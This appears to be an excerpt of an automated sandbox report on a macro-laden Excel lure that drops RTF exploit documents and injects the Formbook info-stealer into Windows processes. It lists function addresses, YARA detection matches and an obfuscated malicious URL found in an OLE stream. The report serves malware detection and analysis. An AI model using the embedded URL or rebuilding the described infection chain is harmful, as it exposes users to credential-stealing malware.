      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025C53017_2_0025C530
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025C95917_2_0025C959
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_00257A7017_2_00257A70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_00253C7817_2_00253C78
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_0025CDA017_2_0025CDA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009FE0C622_2_009FE0C6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009FE2E922_2_009FE2E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA63BF22_2_00AA63BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A263DB22_2_00A263DB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0230522_2_00A02305
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A4A37B22_2_00A4A37B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8443E22_2_00A8443E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A805E322_2_00A805E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A1C5F022_2_00A1C5F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A4654022_2_00A46540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0468022_2_00A04680
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0E6C122_2_00A0E6C1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA262222_2_00AA2622
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A4A63422_2_00A4A634
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0C7BC22_2_00A0C7BC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A2286D22_2_00A2286D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0C85C22_2_00A0C85C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A029B222_2_00A029B2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA098E22_2_00AA098E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A949F522_2_00A949F5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A169FE22_2_00A169FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A4C92022_2_00A4C920
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AACBA422_2_00AACBA4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A86BCB22_2_00A86BCB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA2C9C22_2_00AA2C9C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8AC5E22_2_00A8AC5E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A30D3B22_2_00A30D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0CD5B22_2_00A0CD5B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A32E2F22_2_00A32E2F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A1EE4C22_2_00A1EE4C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A9CFB122_2_00A9CFB1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A72FDC22_2_00A72FDC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A10F3F22_2_00A10F3F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A2D00522_2_00A2D005
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A7D06D22_2_00A7D06D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0304022_2_00A03040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A1905A22_2_00A1905A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8D13F22_2_00A8D13F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA123822_2_00AA1238
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009FF3CF22_2_009FF3CF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0735322_2_00A07353
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A3548522_2_00A35485
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A1148922_2_00A11489
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A3D47D22_2_00A3D47D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AA35DA22_2_00AA35DA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A0351F22_2_00A0351F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8579A22_2_00A8579A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A357C322_2_00A357C3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A9771D22_2_00A9771D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A9F8EE22_2_00A9F8EE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A7F8C422_2_00A7F8C4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8394B22_2_00A8394B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8595522_2_00A85955
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00AB3A8322_2_00AB3A83
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009FFBD722_2_009FFBD7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8DBDA22_2_00A8DBDA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A27B0022_2_00A27B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A9FDDD22_2_00A9FDDD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A8BF1422_2_00A8BF14
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_00A2DF7C22_2_00A2DF7C
      Source: C:\Windows\explorer.exeCode function: 23_2_0282523223_2_02825232
      Source: C:\Windows\explorer.exeCode function: 23_2_0281FB3023_2_0281FB30
      Source: C:\Windows\explorer.exeCode function: 23_2_0281FB3223_2_0281FB32
      Source: C:\Windows\explorer.exeCode function: 23_2_0281B08223_2_0281B082
      Source: C:\Windows\explorer.exeCode function: 23_2_0282403623_2_02824036
      Source: C:\Windows\explorer.exeCode function: 23_2_028285CD23_2_028285CD
      Source: C:\Windows\explorer.exeCode function: 23_2_0281CD0223_2_0281CD02
      Source: C:\Windows\explorer.exeCode function: 23_2_0282291223_2_02822912
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC55CD23_2_05FC55CD
      Source: C:\Windows\explorer.exeCode function: 23_2_05FBF91223_2_05FBF912
      Source: C:\Windows\explorer.exeCode function: 23_2_05FB9D0223_2_05FB9D02
      Source: C:\Windows\explorer.exeCode function: 23_2_05FB808223_2_05FB8082
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC103623_2_05FC1036
      Source: C:\Windows\explorer.exeCode function: 23_2_05FBCB3223_2_05FBCB32
      Source: C:\Windows\explorer.exeCode function: 23_2_05FBCB3023_2_05FBCB30
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC223223_2_05FC2232
      Source: C:\Windows\explorer.exeCode function: 23_2_0610B23223_2_0610B232
      Source: C:\Windows\explorer.exeCode function: 23_2_0610A03623_2_0610A036
      Source: C:\Windows\explorer.exeCode function: 23_2_0610108223_2_06101082
      Source: C:\Windows\explorer.exeCode function: 23_2_0610891223_2_06108912
      Source: C:\Windows\explorer.exeCode function: 23_2_06102D0223_2_06102D02
      Source: C:\Windows\explorer.exeCode function: 23_2_06105B3023_2_06105B30
      Source: C:\Windows\explorer.exeCode function: 23_2_06105B3223_2_06105B32
      Source: C:\Windows\explorer.exeCode function: 23_2_0610E5CD23_2_0610E5CD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0091884E27_2_0091884E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EC86927_2_008EC869
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0093490827_2_00934908
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E215227_2_008E2152
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0090DA8527_2_0090DA85
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0090E2AE27_2_0090E2AE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0092950627_2_00929506
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0090874127_2_00908741
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0229123827_2_02291238
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021EE2E927_2_021EE2E9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F230527_2_021F2305
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F735327_2_021F7353
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0223A37B27_2_0223A37B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022963BF27_2_022963BF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021EF3CF27_2_021EF3CF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022163DB27_2_022163DB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0221D00527_2_0221D005
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0226D06D27_2_0226D06D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F304027_2_021F3040
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0220905A27_2_0220905A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021EE0C627_2_021EE0C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227D13F27_2_0227D13F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0229262227_2_02292622
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0223A63427_2_0223A634
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F468027_2_021F4680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021FE6C127_2_021FE6C1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0228771D27_2_0228771D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021FC7BC27_2_021FC7BC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227579A27_2_0227579A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022257C327_2_022257C3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227443E27_2_0227443E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0222D47D27_2_0222D47D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0222548527_2_02225485
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0220148927_2_02201489
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F351F27_2_021F351F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0223654027_2_02236540
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022705E327_2_022705E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0220C5F027_2_0220C5F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022935DA27_2_022935DA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022A3A8327_2_022A3A83
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02217B0027_2_02217B00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0229CBA427_2_0229CBA4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021EFBD727_2_021EFBD7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02276BCB27_2_02276BCB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227DBDA27_2_0227DBDA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021FC85C27_2_021FC85C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0221286D27_2_0221286D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0228F8EE27_2_0228F8EE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0226F8C427_2_0226F8C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0223C92027_2_0223C920
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227394B27_2_0227394B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227595527_2_02275955
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0229098E27_2_0229098E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021F29B227_2_021F29B2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022849F527_2_022849F5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_022069FE27_2_022069FE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02222E2F27_2_02222E2F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0220EE4C27_2_0220EE4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02200F3F27_2_02200F3F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227BF1427_2_0227BF14
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0221DF7C27_2_0221DF7C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0228CFB127_2_0228CFB1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02262FDC27_2_02262FDC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0227AC5E27_2_0227AC5E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02292C9C27_2_02292C9C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_02220D3B27_2_02220D3B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021FCD5B27_2_021FCD5B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0228FDDD27_2_0228FDDD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009E5FA27_2_0009E5FA
      Source: PO.78NO9.xlsOLE indicator, VBA macros: true
      Source: tmpB50D.tmp.17.drOLE indicator, VBA macros: true
      Source: PO.78NO9.xlsStream path 'MBD008EDE53/\x1Ole' : https://m2g.me/a080Pit1!6E&`)o+fOh%;mj_.MLqr5/|P]OTX1I%(`>)>BX:aTEKzMVWH1E5LnNyCTZOKCR4gXGSPwAk5Ik680AmQaH1DIcL7DuD03UG6NujfTyTbtLSN1xOl3MpLXj0YOPGd7pSSLdhzgrzoI8UEaN7qwoGLsYr65ptx8lokRphZeo9DmUmfmWYym1C6NGRAZtjzKDRiqrOtFTYBXfBtByFIJO6chqWyFS07iPFmw8vi2wrmCzAFA?~^z_mv`>?U%
      Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: tmpB50D.tmp.17.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00934E47 appears 128 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 02233F92 appears 132 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0223373B appears 253 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0225F970 appears 84 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 021EE2A8 appears 60 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 008E1040 appears 587 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 021EDF5C appears 130 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 00A6F970 appears 84 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 00A43F92 appears 132 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 00A4373B appears 253 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 009FE2A8 appears 60 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 009FDF5C appears 137 times
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000017.00000002.638758536.0000000006123000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: powershell.exe PID: 2660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 1368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: aspnet_regbrowsers.exe PID: 2452, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3760, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: mstsc.exe PID: 4060, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.csSecurity API names: _0020.SetAccessControl
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
